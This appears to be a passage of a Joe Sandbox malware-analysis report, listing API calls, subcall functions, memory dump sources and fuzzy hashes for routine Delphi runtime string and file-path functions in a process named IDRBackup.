                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,00000000,50019880), ref: 50019831
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(?,00000000,50019880), ref: 50019839
                                                                                                  • CLSIDFromString.OLE32(00000000,?,00000000,50019880), ref: 5001983F
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(50019887,50019880), ref: 5001987A
                                                                                                    • Part of subcall function 500197B8: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197CC
                                                                                                    • Part of subcall function 500197B8: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@$FromWide$Char$qqrx17Clr$qqrpvExcept$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStr$qqrr17Stringx20Sysutils@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1168828238-0
                                                                                                  • Opcode ID: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                  • Instruction ID: 4276e7b8eb8c2fd0cf21d2c372ffec7e5207b388c706a152fa8cb5ce2d8a9212
                                                                                                  • Opcode Fuzzy Hash: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                  • Instruction Fuzzy Hash: D901D630904688AFEF05CFB5DC519CEB7E8DF4A210F90467AF800D3251EE349E008650
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000B59C
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000B600), ref: 5000B5CE
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@WStrFromPCharLen$qqrr17System@WideStringpci.RTL120(00000000,5000B600), ref: 5000B5E5
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000B607), ref: 5000B5FA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$FromSystem@$AnsiStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$CharClr$qqrpvInternalLen$qqrr17Ref$qqrpvStringpciWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 179845556-0
                                                                                                  • Opcode ID: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                  • Instruction ID: 34ef6e9b8ab651ca66ea423fa2b672ec6f6307ffe3dcc90be6e42d6dd710627f
                                                                                                  • Opcode Fuzzy Hash: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                  • Instruction Fuzzy Hash: 8B014F30A14689DFAF15EFB8DD6166EB7F8EB44300BE042B5A404D3294EB75EE00D785
                                                                                                  APIs
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0AB
                                                                                                    • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                    • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0B5
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                    • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                  • @System@@UStrDelete$qqrr20System@UnicodeStringii.RTL120(00000000,5001D0F1), ref: 5001D0D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @System@@LStrToString$qqrv.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D229
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D235
                                                                                                  • @System@UTF8EncodeToShortString$qqrx20System@UnicodeString.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D23F
                                                                                                    • Part of subcall function 5000D160: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                    • Part of subcall function 5000D160: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                    • Part of subcall function 5000D160: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B67E), ref: 5000B64C
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5000B67E), ref: 5000B663
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0E4
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0F0
                                                                                                  • @System@UTF8Encode$qqrx20System@UnicodeString.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0FA
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(00000000,5000D09C), ref: 5000CFB7
                                                                                                    • Part of subcall function 5000CF8C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D09C), ref: 5000CFDE
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,5000D09C), ref: 5000CFF9
                                                                                                    • Part of subcall function 5000CF8C: @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D09C), ref: 5000D01A
                                                                                                    • Part of subcall function 5000CF8C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5000D09C), ref: 5000D02E
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,00000000,5000D09C), ref: 5000D037
                                                                                                    • Part of subcall function 5000CF8C: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(00000000,00000000,5000D09C), ref: 5000D040
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,00000000,5000D09C), ref: 5000D056
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,00000000,5000D09C), ref: 5000D06A
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(5000D0A3), ref: 5000D08E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016CA3,?,?,?,?,00000000,00000000), ref: 50016C65
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(?,00000000,50016CA3,?,?,?,?,00000000,00000000), ref: 50016C75
                                                                                                    • Part of subcall function 5001671C: @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                  • @System@@UStrEqual$qqrv.RTL120(00000000,50016CA3,?,?,?,?,00000000,00000000), ref: 50016C7E
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3B7
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3CC
                                                                                                    • Part of subcall function 5000A45C: @System@@LStrArrayClr$qqrpvi.RTL120(00000000,00000000), ref: 5000A44F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016D14,?,?,?,?,00000000,00000000), ref: 50016CD9
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(?,00000000,50016D14,?,?,?,?,00000000,00000000), ref: 50016CE9
                                                                                                    • Part of subcall function 5001671C: @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                  • @Sysutils@AnsiCompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,50016D14,?,?,?,?,00000000,00000000), ref: 50016CF2
                                                                                                    • Part of subcall function 50019FDC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A098), ref: 5001A020
                                                                                                    • Part of subcall function 50019FDC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A098), ref: 5001A048
                                                                                                    • Part of subcall function 50019FDC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A098), ref: 5001A05C
                                                                                                    • Part of subcall function 50019FDC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A098), ref: 5001A066
                                                                                                    • Part of subcall function 50019FDC: CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?,00000000,5001A098), ref: 5001A073
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFrom$InternalStr$qqrr20Stringx27System@%T$us$i0$%$StringiStringx20Strutils@$Char$qqrx20CompareSoundex$qqrx20Sysutils@$Asg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Copy$qqrx20DupeStr$qqriStr$qqrx20String$qqrx20StringbStringiiStringt1Stringt2
                                                                                                  • String ID:
                                                                                                  • API String ID: 848067345-0
                                                                                                  • Opcode ID: d47b1065cc661f0fcdedfbc1c7e3849fc8159ff95937f3d3b0d532aaeb83b732
                                                                                                  • Instruction ID: a9308b81826aa0c780e1c50b45dfbe856d660fbecc3233872d1bb9e489c68cf2
                                                                                                  • Opcode Fuzzy Hash: d47b1065cc661f0fcdedfbc1c7e3849fc8159ff95937f3d3b0d532aaeb83b732
                                                                                                  • Instruction Fuzzy Hash: BDF0B4357042847BD701CAD5EC91AAEB7EDDB8D610FA14176F504D3381DA74DE418594
                                                                                                  APIs
                                                                                                  • @System@@WStrLen$qqrx17System@WideString.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093AE
                                                                                                  • @System@@LStrFromWStr$qqrr27System@%AnsiStringT$us$i0$%x17System@WideStringus.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093C8
                                                                                                  • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093D4
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500093F8,?,?,?,00000000,?,5000938F), ref: 500093EB
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$StringSystem@$AnsiSystem@%Wide$Clr$qqrpvFreeFromLen$qqrx17Mem$qqrpvRecx27Str$qqrr27String$qqrr15StringusT$us$i0$%iT$us$i0$%x17TextWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1130800983-0
                                                                                                  • Opcode ID: b849d90925cc33044c776b6e4e2f5848c8cfe3ce250f7a05f47d86eedd24106f
                                                                                                  • Instruction ID: ef5ea901b8e5fa30709b5689cebf9e2eb1ad37d003b92d6465d3830585f69d9b
                                                                                                  • Opcode Fuzzy Hash: b849d90925cc33044c776b6e4e2f5848c8cfe3ce250f7a05f47d86eedd24106f
                                                                                                  • Instruction Fuzzy Hash: DFF059307042846BEB14CAB8AC71A4EB2DDDB89600FE18577B500C3381DD30DE018690
                                                                                                  APIs
                                                                                                  • @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                  • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120 ref: 5000D62C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$FromSystem@@Unicode$CharChar$qqrr20FindInstance$qqruiLen$qqrr20LoadResourceStringStringpbStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2990883651-0
                                                                                                  • Opcode ID: 55ca08126530cfa26b8a12066b7b7f1d4282c8620ddcc8f6fe61370ac2b4a099
                                                                                                  • Instruction ID: 492cc944b019d22fa5aeb3a5e8639eadf2eec20015de2a4354c3fe8e2fc88a12
                                                                                                  • Opcode Fuzzy Hash: 55ca08126530cfa26b8a12066b7b7f1d4282c8620ddcc8f6fe61370ac2b4a099
                                                                                                  • Instruction Fuzzy Hash: E7F02EB4701A808BFB10CA8CD8E2F8A73DC8B18201F808223B94CCB346DA21DD0183A2
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                    • Part of subcall function 50009E7C: @System@@NewUnicodeString$qqri.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E87
                                                                                                    • Part of subcall function 50009E7C: @System@Move$qqrpxvpvi.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E9A
                                                                                                    • Part of subcall function 50009E7C: @System@@LStrClr$qqrpv.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009EA1
                                                                                                  • GetCommandLineW.KERNEL32 ref: 50004764
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
